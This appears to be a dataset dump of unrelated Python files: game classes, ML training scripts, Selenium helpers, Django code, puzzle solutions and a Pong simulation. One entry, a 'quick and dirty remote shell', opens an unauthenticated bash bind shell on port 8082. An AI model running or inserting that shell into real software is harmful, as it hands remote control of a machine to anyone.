        # Shuffle each pool, then take the first entry as the random pick.
        random.shuffle(boss_names)
        random.shuffle(boss_weapons)
        random.shuffle(boss_major_armors)
        random.shuffle(boss_minor_armors)
        boss = Mob(boss_names[0], self.p, plural=boss_names[0], rarity='super rare')
        boss.health = 500
        boss.equipped_weapon = boss_weapons[0]
        boss.major_armor = boss_major_armors[0]
        boss.minor_armor = boss_minor_armors[0]
        boss.irritation_level = 10
        self.mobs = [boss]
        if self.name == 'a castle':
            self.jobs = [Job('king of the realm', location=self.p.location, salary=1100)]
        if self.name == 'a volcanic base':
            self.jobs = [Job('evil overlord', location=self.p.location, salary=1100)]
class Job:
    """An employment opportunity anchored to a map location.

    Falsy requirement arguments are normalized to None (and salary to 0) so
    the rest of the code can test them with plain truthiness checks.
    """

    def __init__(self, name, location, skills_needed=None, salary=0, skills_learned=None, inventory_needed=None):
        self.name = name
        self.location = location
        self.skills_needed = skills_needed if skills_needed else None
        self.salary = salary if salary else 0
        self.skills_learned = skills_learned if skills_learned else None
        self.inventory_needed = inventory_needed if inventory_needed else None
        # How many times the player has applied for this job.
        self.application_attempts = 0
class Mob:
    """An NPC the player can talk to, trade with, quest for, or fight."""

    def __init__(self, name, p, plural, rarity, inventory=None):
        self.name = name
        self.p = p                      # back-reference to the Player
        self.plural = plural
        self.quantity = 1
        self.rarity = rarity
        # NOTE(review): this attribute shadows the static method of the same name.
        self.skills = self.skills()
        self.quest = None
        # Random loot drawn from the biome the player currently stands in.
        self.inventory = inventory or drop_item(add_dicts_together(items['master'], items[p.square.square_type]))
        self.health = 100
        self.equipped_weapon = self.equip()
        # Wear the first major/minor armor piece found in the loot, if any.
        major = [x for x in self.inventory if x.category == 'major armor']
        minor = [x for x in self.inventory if x.category == 'minor armor']
        self.major_armor = major[0] if major else None
        self.minor_armor = minor[0] if minor else None
        self.irritation_level = 0

    def equip(self):
        """Move the highest-rated weapon out of the inventory and return it (or None)."""
        nice_weapons = []
        for i in self.inventory:
            try:
                if i.weapon_rating:
                    nice_weapons.append(i)
            except AttributeError:
                # Inventory entries without a weapon_rating attribute are not weapons.
                pass
        nice_weapons.sort(key=lambda x: x.weapon_rating, reverse=True)
        if nice_weapons:
            self.inventory.remove(nice_weapons[0])
            return nice_weapons[0]
        else:
            return None

    @staticmethod
    def skills():
        """ Pick the skills for a mob, these determine what a player can get from completing a quest """
        all_skills = ["strength", "patience", "cleanliness", "leadership", "communication",
                      "science", "math", "engineering", "intelligence", "driving"]
        random.shuffle(all_skills)
        return all_skills[0:2]

    def generate_quest(self):
        """
        inventory based
        bring me x of an object to learn a skill

        NOTE(review): return values are inconsistent (implicit None, False,
        explicit None) — confirm how callers distinguish them.
        """
        if odds(3):
            # Fetch quest: demand N copies of a random biome item.
            quest_items = add_dicts_together(items["master"], items[self.p.square.square_type])
            quest_item = random.choice(list(quest_items.keys()))
            i = Item(quest_item, 0, **quest_items[quest_item])
            self.inventory.append(i)
            # Rarer items are requested in smaller quantities.
            quantity = {'super rare': '1',
                        'rare': '2',
                        'uncommon': '3',
                        'common': '6',
                        'super common': '15'}
            q = quantity[i.rarity]
            self.quest = i, int(q), f"{self.p.name}, if you bring " \
                                    f"me {q} {i.plural if int(q) > 1 else remove_little_words(i.name)}, " \
                                    f"I will teach you a valuable skill."
            return
        elif odds(5):
            # Assassination quest: pick a random mob type from every biome and building.
            mobs = []
            for biome, building in buildings.items():
                for b, attributes in building.items():
                    if attributes.get('mobs'):
                        for k in attributes['mobs'].keys():
                            mobs.append(k)
            for biome, mob in wild_mobs.items():
                for k in mob.keys():
                    mobs.append(k)
            # 'names' is presumably a module-level list of person names — TODO confirm.
            target = f"{mobs[random.randint(0, len(mobs)-1)]} named {names[random.randint(0, len(names)-1)]}"
            print(f"Well, we'll keep this off the record, but I can arrange for some money to find its way "
                  f"into your account if you make {colored(target, 'yellow')} disappear, if you know what I mean...")
            self.p.hit_list.append(target)
            return False
        else:
            return None
|
5,631 | abdf5aee77ee879c50d0e605d5fd95e28a7ef7aa | import Ploneboard
import PloneboardForum
import PloneboardConversation
import PloneboardComment
|
5,632 | ba379ed90bccd05d058f69f33a960779f8b8bcd5 | from model import *
from data import *
import os
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
data_gen_args = dict(horizontal_flip = True,
vertical_flip = True)
imageTargetSize = (256, 256)
trainPath = '/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/Training'
trainImagePath = 'Selected Images Training'
trainLabelPath = 'Selected Images Label Binarized Training'
#augTrainPath = '/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/train/aug'
#validationPath = '/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/validation'
#validationImagePath = 'Selected Images Resized Validation'
#validationLabelPath = 'Selected Images Label Resized Binarized Validation'
trainGene = trainGenerator(batch_size = 1,
train_path = trainPath,
trainImage_folder = trainImagePath,
trainLabel_folder = trainLabelPath,
aug_dict = data_gen_args,
save_to_dir = None,
target_size = imageTargetSize,
trainImage_color_mode = 'grayscale',
trainLabel_color_mode = 'grayscale',
trainImage_save_prefix = 'Image',
trainLabel_save_prefix = 'Label',
seed = 1,
flag_multi_class = False,
num_class = 2)
""""
validationGene = validationGenerator(validation_path = validationPath,
validationImage_path = validationImagePath,
validationLabel_path = validationLabelPath,
target_size = imageTargetSize,
flag_multi_class = False,
as_gray = True)
"""
model = unet()
model_checkpoint = ModelCheckpoint('unet_testing.hdf5', monitor='loss',verbose=1, save_best_only=True)
trainHistory = model.fit_generator(trainGene,
steps_per_epoch=100,
epochs=7,
callbacks = [model_checkpoint]
)
testImagePath = '/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/Test/Selected Images Test'
testGene = testGenerator(test_path = testImagePath,
target_size = imageTargetSize,
flag_multi_class = False,
as_gray = True)
results = model.predict_generator(testGene, len(os.listdir(testImagePath)), verbose = 1)
saveResult("/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/here", results)
training_loss = trainHistory.history['loss']
#test_loss = history.history['val_loss']
epoch_count = range(1, len(training_loss)+1)
plt.plot(epoch_count, training_loss, 'r--')
#plt.plot(epoch_count, test_loss, 'b-')
plt.legend(['Training Loss'])
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.title('U-Net Training Loss Function')
plt.show();
|
5,633 | bd419d0a197a5e5a99a370e45cdb53a276ac5507 | from sklearn import cluster
from sklearn.metrics import adjusted_rand_score
import matplotlib.pyplot as plt
def test_Kmeans(*data):
    """Fit a default KMeans model and report the ARI and total within-cluster distance."""
    samples, labels_true = data
    model = cluster.KMeans()
    model.fit(samples)
    predicted_labels = model.predict(samples)
    print("ARI: %s" % adjusted_rand_score(labels_true, predicted_labels))
    print("Sum center distance %s" % (model.inertia_,))
def test_Kmeans_nclusters(*data):
    """
    Examine how the KMeans clustering result varies with n_clusters.

    For each cluster count we record the ARI against the ground-truth labels
    and the total distance of all samples to their cluster centers (inertia),
    then plot both curves.
    """
    x, labels_true = data
    nums = range(1, 50)
    ARIs = []
    Distances = []
    for num in nums:
        clst = cluster.KMeans(n_clusters = num)
        clst.fit(x)
        predicted_labels = clst.predict(x)
        ARIs.append(adjusted_rand_score(labels_true, predicted_labels))
        Distances.append(clst.inertia_)
    # Plot ARI and inertia side by side.
    fig = plt.figure()
    ax = fig.add_subplot(1, 2, 1)
    ax.plot(nums, ARIs, marker = "+")
    ax.set_xlabel("n_clusters")
    ax.set_ylabel("ARI")
    ax = fig.add_subplot(1, 2, 2)
    ax.plot(nums, Distances, marker = "o")
    ax.set_xlabel("n_cluster")
    ax.set_ylabel("intertia_")
    fig.suptitle("KMeans")
    plt.show()
def test_KMeans_n_init(*data):
    """
    Examine the impact of the number of KMeans runs (n_init) and the
    centroid-initialization strategy ('k-means++' vs 'random') on the
    ARI and the inertia, plotting both strategies for comparison.
    """
    x, labels_true = data
    nums = range(1, 50)
    # Prepare the figure; _k suffixes hold 'k-means++' results, _r 'random'.
    fig = plt.figure()
    ARIs_k = []
    Distances_k = []
    ARIs_r = []
    Distances_r = []
    for num in nums:
        clst = cluster.KMeans(n_init = num, init = "k-means++")
        clst.fit(x)
        predicted_labels = clst.predict(x)
        ARIs_k.append(adjusted_rand_score(labels_true, predicted_labels))
        Distances_k.append(clst.inertia_)
        clst = cluster.KMeans(n_init = num, init = "random")
        clst.fit(x)
        predicted_labels = clst.predict(x)
        ARIs_r.append(adjusted_rand_score(labels_true, predicted_labels))
        Distances_r.append(clst.inertia_)
    ax = fig.add_subplot(1, 2, 1)
    ax.plot(nums, ARIs_k, marker = "+", label = "k-means++")
    ax.plot(nums, ARIs_r, marker = "+", label = "random")
    ax.set_xlabel("n_init")
    ax.set_ylabel("ARI")
    ax.set_ylim(0, 1)
    ax.legend(loc = "best")
    ax = fig.add_subplot(1, 2, 2)
    ax.plot(nums, Distances_k, marker = "o", label = "k-means++")
    ax.plot(nums, Distances_r, marker = "o", label = "random")
    ax.set_xlabel("n_init")
    ax.set_ylabel("inertia_")
    ax.legend(loc = "best")
    fig.suptitle("KMeans")
    plt.show()
|
5,634 | 82fc86e44d02c45d7904139e4dfdff069e2bdb90 | import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def open_browser(browser="chrome"):
    """Create a WebDriver for the requested browser name.

    Supported names: "chrome", "firefox", "ie". For anything else a hint is
    printed and None is returned.
    """
    if browser == "chrome":
        return webdriver.Chrome()
    if browser == "firefox":
        return webdriver.Firefox()
    if browser == "ie":
        return webdriver.Ie()
    print("请输入正确的浏览器,例如'chrome','Firefox','ie'")
    return None
class Base:
    """Thin Selenium page-object base: explicit-wait element lookups and common actions."""

    def __init__(self, driver):
        self.driver = driver

    def open_url(self, url):
        """Navigate to *url* and maximize the browser window."""
        self.driver.get(url)
        self.driver.maximize_window()  # maximize the window

    def find_element(self, locator, timeout=10):
        """Wait up to *timeout* seconds for the element located by *locator* and return it."""
        element = WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located(locator))
        return element

    def find_elements(self, locator, timeout=10):
        """Wait up to *timeout* seconds for all elements matching *locator* and return them."""
        elements = WebDriverWait(self.driver, timeout).until(EC.presence_of_all_elements_located(locator))
        return elements

    def click(self, locator, timeout=10):
        """Wait for the element located by *locator*, then click it."""
        element = self.find_element(locator=locator, timeout=timeout)
        element.click()

    def send_keys(self, locator, text, timeout=10):
        """Wait for the element located by *locator*, clear it, and type *text*."""
        element = self.find_element(locator=locator, timeout=timeout)
        element.clear()
        element.send_keys(text)

    def is_text_in_element(self, locator, text, timeout=10):
        """Return True once *text* appears in the element; False on timeout/lookup failure."""
        try:
            result = WebDriverWait(self.driver, timeout=timeout).until(EC.text_to_be_present_in_element(locator, text))
            return result
        # Bug fix: the bare `except:` also swallowed KeyboardInterrupt/SystemExit.
        except Exception:
            return False

    def is_value_in_element(self, locator, value, timeout=10):
        """Return True once the element's value attribute contains *value*; False on timeout."""
        try:
            result = WebDriverWait(self.driver, timeout=timeout).until(
                EC.text_to_be_present_in_element_value(locator, value))
            return result
        # Bug fix: narrowed from a bare `except:` (see is_text_in_element).
        except Exception:
            return False

    def close_browser(self):
        """Quit the driver, closing every associated window."""
        self.driver.quit()
|
def parse(filename):
    """Read an AoC day-22 style input: two blank-line-separated deck blocks,
    each a 'Player N:' header followed by one card value per line.
    Returns a tuple (deck1, deck2) of int lists."""
    block_one, block_two = open(filename).read().strip().split("\n\n")
    return tuple(map(lambda block: list(map(int, block.split("\n")[1:])), [block_one, block_two]))
def score(deck):
    """Score a deck: the bottom card counts once, the next twice, ...,
    the top card counts len(deck) times."""
    return sum(card * weight for weight, card in enumerate(reversed(deck), start=1))
def solution1(deck1, deck2):
    """Play regular Combat to completion and return the winner's deck score."""
    while deck1 and deck2:
        top1, top2 = deck1[0], deck2[0]
        # Round winner takes both cards, own card on top of the opponent's.
        if top1 > top2:
            deck1 = deck1[1:] + [top1, top2]
            deck2 = deck2[1:]
        else:
            deck2 = deck2[1:] + [top2, top1]
            deck1 = deck1[1:]
    return score(deck1) if deck1 else score(deck2)
def can_recurse(deck1, deck2):
    """A sub-game is played only when each player holds at least as many
    remaining cards as the value of the card they just drew."""
    drawn1, drawn2 = deck1[0], deck2[0]
    return drawn1 < len(deck1) and drawn2 < len(deck2)
def combat(deck1, deck2):
    """Play one full game of Recursive Combat.

    Returns (winner, winning_score) where winner is "p1" or "p2".
    """
    # Deck configurations already seen in THIS game; a repeat ends the game.
    db = set()
    while len(deck1) > 0 and len(deck2) > 0:
        key = (tuple(deck1), tuple(deck2))
        if key in db:
            # Infinite-game guard: player 1 wins on a repeated configuration
            # (AoC 2020 day 22 rule).
            return "p1", score(deck1)
        db.add(key)
        p1, p2 = deck1[0], deck2[0]
        if can_recurse(deck1, deck2):
            # Both players can afford it: the round is decided by a recursive
            # sub-game played with copies of the next p1/p2 cards.
            winner, _ = combat(deck1[1:p1+1], deck2[1:p2+1])
        else:
            # Otherwise, the higher card wins the round.
            winner = "p1" if p1 > p2 else "p2"
        # Round winner takes both cards, own card first.
        if winner == "p1":
            deck1 = deck1[1:] + [p1, p2]
            deck2 = deck2[1:]
        else:
            deck1 = deck1[1:]
            deck2 = deck2[1:] + [p2, p1]
    if len(deck1) > 0:
        return "p1", score(deck1)
    return "p2", score(deck2)
def solution2(deck1, deck2):
    """Play Recursive Combat and return only the winning score."""
    _winner, points = combat(deck1, deck2)
    return points
def main():
    """Run part 1 then part 2 against the sample and the real input."""
    for solve in (solution1, solution2):
        for puzzle_file in ("sample.txt", "input.txt"):
            print(solve(*parse(puzzle_file)))


if __name__ == "__main__":
    main()
|
5,636 | be5178f013e639d5179ed1af380dd7a63044bff2 | import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
    """Load the Book-Crossing ratings file, print basic statistics, and plot
    how many users gave each rating value."""
    # The ISBN column may contain non-ASCII characters, so the encoding must
    # be specified when reading the file.
    ratings = pd.read_table(file_path, header=0,
                            sep=';', encoding='ISO-8859-1')
    print('前5条数据:\n{}\n'.format(ratings.head(5)))
    print('总的数据条数:\n{}\n'.format(ratings.count()))
    print('用户对图书的评分范围:<{},{}>\n'.format(
        min(ratings['Book-Rating']), ratings['Book-Rating'].max()))
    # Count how many ratings fall in each score bucket.
    rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
    plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
    for x, y in zip(rateSer.keys(), rateSer.values):
        # Annotate each bar with its exact count, slightly above the bar.
        plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
    plt.xlabel('用户评分')
    plt.ylabel('评分对应的人数')
    plt.title('每种评分下对应的人数统计图')
    plt.show()


if __name__ == "__main__":
    get_ratings(file_path='BX-Book-Ratings.csv')
|
5,637 | 38a2113c0531648a90cf70c4b18d640d5ebb3f47 | '''
quick and dirty remote shell using sockets and file descriptors
'''
import socket
import os
# SECURITY WARNING: this opens an UNAUTHENTICATED bind shell on TCP port 8082 —
# anyone who can reach the port gets a local /bin/bash session. Lab/CTF use only.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('',8082))           # listen on all interfaces, port 8082
s.listen(1)                 # accept a single client
conn,__=s.accept()          # blocks until a client connects
os.dup2(conn.fileno(),0)    # wire the socket to the shell's stdin (fd 0)...
os.dup2(conn.fileno(),1)    # ...and stdout (fd 1); stderr is left untouched
#print("asdf")
os.system('/bin/bash')      # blocks until the remote shell session exits
conn.close()
|
5,638 | 6546d04d3755d62d1a8756bdec1a10f6f018dcea | from django.apps import AppConfig
class FitnerappConfig(AppConfig):
    """Django application configuration for the ``fitnerapp`` app."""
    # Dotted path / label Django uses to register this application.
    name = 'fitnerapp'
|
5,639 | 1babf9f27e6792d2a1c2545a1e3bcd08fefa0975 | import cv2
import numpy as np
import random
def main():
    """Threshold a grayscale test image and fill each detected contour with a random color."""
    img = cv2.imread('test_image.png', 0)  # flag 0 -> load as grayscale
    # Blank BGR canvas of the same height/width as the input.
    res = np.zeros((img.shape[0], img.shape[1], 3), np.uint8)
    # Binary threshold at 50; [1] keeps only the image from (retval, image).
    thresh = cv2.threshold(img, 50, 255, 0)[1]
    # Three-value unpacking matches the OpenCV 3.x findContours signature;
    # NOTE(review): OpenCV 4.x returns only (contours, hierarchy) — confirm version.
    _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    for cnt in contours:
        # Thickness -1 fills the whole contour with a random BGR color.
        cv2.drawContours(res, [cnt], 0, (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), -1)
    cv2.imshow('res', res)
    cv2.waitKey(0)


if __name__ == "__main__":
    main()
def solution(A):
    """Return the missing element of the consecutive run 1..n+1, given the
    n values of A (Codility PermMissingElem style input).

    Fix: the previous version called ``A.sort()``, silently mutating the
    caller's list; we now iterate a sorted copy instead. All return values
    are unchanged.
    """
    if not A:
        # No elements: the missing value of the run 1..1 is 1.
        return 1
    if len(A) == 1:
        # Single element: [1] is missing 2, anything else is missing 1.
        return 2 if A[0] == 1 else 1
    prev = 0
    # Walk the sorted copy; the first gap pinpoints the missing value.
    for value in sorted(A):
        if value != prev + 1:
            return value - 1
        prev = value
    # No gap found: the missing value is one past the largest element.
    return prev + 1
|
5,641 | ea414835554ea3dcac2017036692cf178526f91b | # Generated by Django 3.0.7 on 2020-12-16 15:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: replaces the single ``Player`` model with
    two models, ``playerA`` and ``playerB``, each linked to ``play.Room``
    via a cascading foreign key."""

    dependencies = [
        ('play', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='playerA',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('playerA', models.CharField(max_length=15)),
                ('join_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='play.Room')),
            ],
            options={
                'verbose_name_plural': 'PlayerA',
            },
        ),
        migrations.CreateModel(
            name='playerB',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('playerB', models.CharField(max_length=15)),
                ('join_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='play.Room')),
            ],
            options={
                'verbose_name_plural': 'PlayerB',
            },
        ),
        # The old unified Player model is removed after its replacements exist.
        migrations.DeleteModel(
            name='Player',
        ),
    ]
|
5,642 | 74d1491280eba1ceb06ccf6f45546cdb41149687 | #!/usr/bin python3
# coding: utf-8
"""
AUTHOR: bovenson
EMAIL: szhkai@qq.com
FILE: 03.py
DATE: 17-9-25 下午7:59
DESC:
"""
from socket import socket
|
5,643 | 4cc1c8668a84cc6faadf60053568d155b8852c5f | # -*- coding: utf-8 -*-
"""Application configuration.
See https://github.com/sloria/cookiecutter-flask for configuration options with other flask-extensions
"""
import os
class Config(object):
    """Base configuration shared by every environment."""

    # Secret key is read from the environment; the fallback is for local use only.
    SECRET_KEY = os.environ.get('DELIVERY_ASSISTANT_SECRET', 'secret-key')  # TODO: Change me
    # Directory containing this module, and the repository root one level up.
    APP_DIR = os.path.abspath(os.path.dirname(__file__))
    PROJECT_ROOT = os.path.abspath(os.path.join(APP_DIR, os.pardir))

    # Flask-Assistant integration settings.
    ASSIST_ACTIONS_ON_GOOGLE = True
    CLIENT_ACCESS_TOKEN = 'YOUR API.AI AGENT CLIENT ACCESS TOKEN'
    DEV_ACCESS_TOKEN = 'YOUR API.AI AGENT DEVELOPER ACCESS TOKEN'
class ProdConfig(Config):
    """Production configuration: debugging disabled."""
    ENV = 'prod'
    DEBUG = False
class DevConfig(Config):
    """Development configuration: debugging enabled."""
    ENV = 'dev'
    DEBUG = True
class TestConfig(Config):
    """Test configuration: testing mode and debugging enabled."""
    TESTING = True
    DEBUG = True
|
5,644 | 2bbfbc597a4e1f8b46f58a4c6002a9943eff557a | # pylint: skip-file
from sorter.lib.request_data import read_url
from urllib2 import HTTPError
class fake_urllib(object):
    """Test double for urllib2: urlopen can be configured to raise a 404,
    and the response body is a canned string."""

    def __init__(self, should_fail=False):
        self.should_fail = should_fail

    def urlopen(self, uri):
        """Simulate a request; raise HTTPError 404 when configured to fail."""
        if self.should_fail == True:
            raise HTTPError('FAKER.GTLD', 404, 'Four Oh Four', None, None)

    def read(self):
        """Return the canned response body."""
        return "fake body"

    def close(self):
        """No resources to release in the fake."""
        pass
class fake_logger(object):
    """Test double for a logger: remembers the reason of the last warning."""

    def __init__(self):
        self.msg = None

    def info(self, msg, *args):
        """Informational messages are deliberately discarded."""
        pass

    def warn(self, msg, *args):
        """The code under test passes an error object; record its reason text."""
        self.msg = msg.reason
class TestRequestData(object):
    """Unit tests for sorter.lib.request_data.read_url, using monkeypatched fakes."""

    def test_read_url(self, monkeypatch):
        """A successful fetch returns the fake response body."""
        monkeypatch.setattr("urllib2.urlopen", lambda foo: fake_urllib())
        monkeypatch.setattr("sorter.lib.request_data.LOGGER", fake_logger())
        body = read_url("fakeurl")
        assert body == "fake body"

    def test_read_url_404(self, monkeypatch):
        """On an HTTP 404, read_url logs the error reason and returns None."""
        faker = fake_logger()
        monkeypatch.setattr("sorter.lib.request_data.urllib2", fake_urllib(True))
        monkeypatch.setattr("sorter.lib.request_data.LOGGER", faker)
        body = read_url("fakeurl")
        assert body == None
        assert faker.msg == 'Four Oh Four'
|
5,645 | 5d6ec1b23dcbc935fe80dd09a2e967eb7e37a363 | from knox.models import AuthToken
from rest_framework import generics, permissions, status
from rest_framework.response import Response
from accounts.serializers import UserSerializer, RegisterSerializer, LoginSerializer, ChangePasswordSerializer
# Register API
class RegisterAPI(generics.CreateAPIView):
    """Create a new user account and immediately issue a Knox auth token."""
    permission_classes = [
        permissions.AllowAny
    ]
    serializer_class = RegisterSerializer

    def post(self, request, *args, **kwargs):
        """Validate the registration payload, create the user, and return
        the serialized user plus a fresh token string."""
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        user = serializer.save()
        return Response({
            "user": UserSerializer(user, context=self.get_serializer_context()).data,
            # AuthToken.objects.create returns (instance, token); [1] is the token string.
            "token": AuthToken.objects.create(user)[1]
        })
# Login API
class LoginAPI(generics.GenericAPIView):
    """Authenticate a user and issue a Knox auth token."""
    serializer_class = LoginSerializer

    def post(self, request, *args, **kwargs):
        """Validate credentials; the serializer yields the user on success."""
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        user = serializer.validated_data
        return Response({
            "user": UserSerializer(user, context=self.get_serializer_context()).data,
            # AuthToken.objects.create returns (instance, token); [1] is the token string.
            "token": AuthToken.objects.create(user)[1]
        })
class ChangePasswordAPI(generics.UpdateAPIView):
    """Set a new password for the authenticated user."""
    permission_classes = [
        permissions.IsAuthenticated
    ]
    serializer_class = ChangePasswordSerializer

    def update(self, request, *args, **kwargs):
        """Validate the payload, hash and store the new password."""
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        user = request.user
        # set_password hashes the value; save() persists it.
        user.set_password(serializer.validated_data['new_password'])
        user.save()
        return Response({
            'success': True,
        }, status=status.HTTP_200_OK)
# Get User API
class UserAPI(generics.RetrieveUpdateAPIView):
    """Retrieve or update the authenticated user's own profile."""
    permission_classes = [
        permissions.IsAuthenticated,
    ]
    serializer_class = UserSerializer

    def get_object(self):
        # Always operate on the requesting user; no pk lookup needed.
        return self.request.user

    def update(self, request, *args, **kwargs):
        """Overwrite first/last name and mobile from the request payload.

        Fixes: the response previously reported ``"success": False`` even
        though the save succeeded, and a leftover debug ``print`` is removed.
        Note: absent payload keys still overwrite the fields with None, as
        before — callers relying on full-payload updates are unaffected.
        """
        user = self.get_object()
        user.first_name = request.data.get('first_name')
        user.last_name = request.data.get('last_name')
        user.mobile = request.data.get('mobile')
        user.save()
        return Response({
            "success": True
        }, status=status.HTTP_200_OK)
|
5,646 | 3191fa5f9c50993d17e12e4e2e9d56cfce2108e7 | from flask_table import Table, Col
"""Lets suppose that we have a class that we get an iterable of from
somewhere, such as a database. We can declare a table that pulls out
the relevant entries, escapes them and displays them.
"""
class Item(object):
    """Demo row object: an item with a name and a Category instance."""
    def __init__(self, name, category):
        self.name = name
        self.category = category
class Category(object):
    """Demo nested object: a category identified only by its name."""
    def __init__(self, name):
        self.name = name
class ItemTable(Table):
    """flask_table definition rendering an Item's name and its category's name."""
    name = Col('Name')
    # attr_list walks item.category.name to populate the column.
    category_name = Col('Category', attr_list=['category', 'name'])
    # Equivalently: Col('Category', attr='category.name')
    # Both syntaxes are kept as the second is more readable, but
    # doesn't cover all options. Such as if the items are dicts and
    # the keys have dots in.
def main():
    """Build a two-row demo table and print its rendered HTML."""
    demo_rows = [Item('A', Category('catA')),
                 Item('B', Category('catB'))]
    print(ItemTable(demo_rows).__html__())


if __name__ == '__main__':
    main()
|
5,647 | 5485a1210a0c0361dbb000546ee74df725fad913 | #!/usr/bin/env python3.4
# -*- coding: utf-8 -*-
"""
Das Pong-Spielfeld wird simuliert.
Court moduliert ein anpassbares Spielfeld für Pong mit einem standardmäßigen Seitenverhältnis von 16:9.
Jenes Spielfeld verfügt über einen Ball und zwei Schläger, jeweils links und rechts am Spielfeldrand,
sowie einen Punktestand für beide Spieler (0 und 1).
Spieler 0 spielt auf der linken Hälfte, Spieler 1 auf der rechten Hälfte.
Zwecks einfacher Adaptierung an Folgesysteme ist die Schnittstelle mit normierten Ein- und Ausgabewerten versehen,
welches alle Daten auf ein Interval [-1.0, 1.0] normiert.
"""
__author__ = "Daniel Speck, Florian Kock"
__copyright__ = "Copyright 2014, Praktikum Neuronale Netze"
__license__ = "GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Daniel Speck, Florian Kock"
__email__ = "2speck@informatik.uni-hamburg.de, 2kock@informatik.uni-hamburg.de"
__status__ = "Development"
import numpy as np
import random
class court:
"""
Objekt, dass das Spielfeld darstellt.
Enthält außerdem Funktionen zur Manipulation von Schlägern und Inspektoren für die Daten:
- Skalierte Daten für die KNNs
- Unskalierte Daten für die Visualisierung
"""
def __init__(self):
    """
    Initialize the court: field geometry, ball vectors, bats, and score.

    :return void
    """
    ##############################
    ### tunable parameters ###
    ##############################
    # Field size (16:9 by default; this ratio proved itself in testing).
    self.x_max = 16.0
    self.y_max = 9.0
    # Ball speed: factor applied to the direction vector each step
    # (newPosition = oldPosition + directionVector * speed).
    self.speed = 0.5
    # Noise factor added to the reported ball position.
    self.outputNoiseMax = 0.0  # WARNING: never tested with noise; keep at 0!
    # Should the ball fly out of the field, or bounce back and forth forever?
    # True  -> ball is never reset to the start position after a goal
    # False -> ball is reset to the start position after a goal
    self.infinite = False
    # Bat size for players 0 and 1 (measured from the center to one end,
    # i.e. enter HALF of the desired total length!).
    self.batsize = 1.0
    # In command mode the bat is moved with the 'u' and 'd' commands;
    # this is the corresponding step width.
    self.batstep = 0.3
    ############################################
    ### internal state (do not modify!) ###
    ############################################
    # Ball position vector (origin is [0, 0]).
    self.posVec = None
    # Ball direction/movement unit vector.
    self.dirVec = None
    # Whether the ball has hit a bat [left, right].
    self._bathit = [False, False]
    # Whether the ball has crossed the goal line [left, right].
    self._out = [False, False]
    # Score [player 0, player 1].
    self.Points = [0, 0]
    # Point of impact of the ball on the goal line; filled in after an
    # impact and then used for the error computation (supervised learning).
    self.poi = [None, None]
    # Initial bat positions on each player's line [leftBat, rightBat];
    # as usual in Pong, bats can only move along the Y axis.
    self.bat = [self.y_max / 2.0, self.y_max / 2.0]
    # Counts bat hits (ball/bat collisions). The networks should learn
    # different angles (the angle is always randomly initialized), but a
    # well-trained net may never miss on some angles; to prevent such an
    # endless rally the ball is reset after 10 hits to the field center
    # with a new random angle.
    self.bouncecount = 0
    # Start preparation: initialize position and direction vectors
    # for the first time.
    self.__initvectors()
    def __initvectors(self):
        """
        Initialise the ball's position and direction vectors.

        The ball starts somewhere on the centre line with a random launch
        angle of at most +/-45 degrees from the horizontal.
        :return void
        """
        # Build the direction vector:
        # draw a random angle in radians; 2*pi is the full unit circle (360
        # degrees), so [-pi/4, +pi/4] corresponds to [-45, +45] degrees.
        # This interval proved useful: steeper angles hurt the learning
        # effect and above all the learning time.
        rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
        # Rotation matrix for the random angle
        rotMatrix = np.array([
            [np.cos(rotationAngle), -np.sin(rotationAngle)],
            [np.sin(rotationAngle), np.cos(rotationAngle)]
        ])
        # Apply the rotation matrix to a horizontal unit vector
        self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
        # Randomly decide whether the ball starts towards the left
        # (player 0) or the right (player 1).
        if random.random() > 0.5:
            self.dirVec[0] *= -1.0  # mirror the x component at the y axis
        # Build the position vector:
        # start somewhere on the centre line
        # (x is fixed to the centre line, y is random)
        self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()])
        # Reset the paddle-hit counter (see __init__)
        self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
    def __sensor_x(self):
        """
        Return the x component of the ball's position vector with noise added.
        :return float, x component of the position vector
        """
        # Noise is uniform in [-outputNoiseMax/2, +outputNoiseMax/2]
        return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
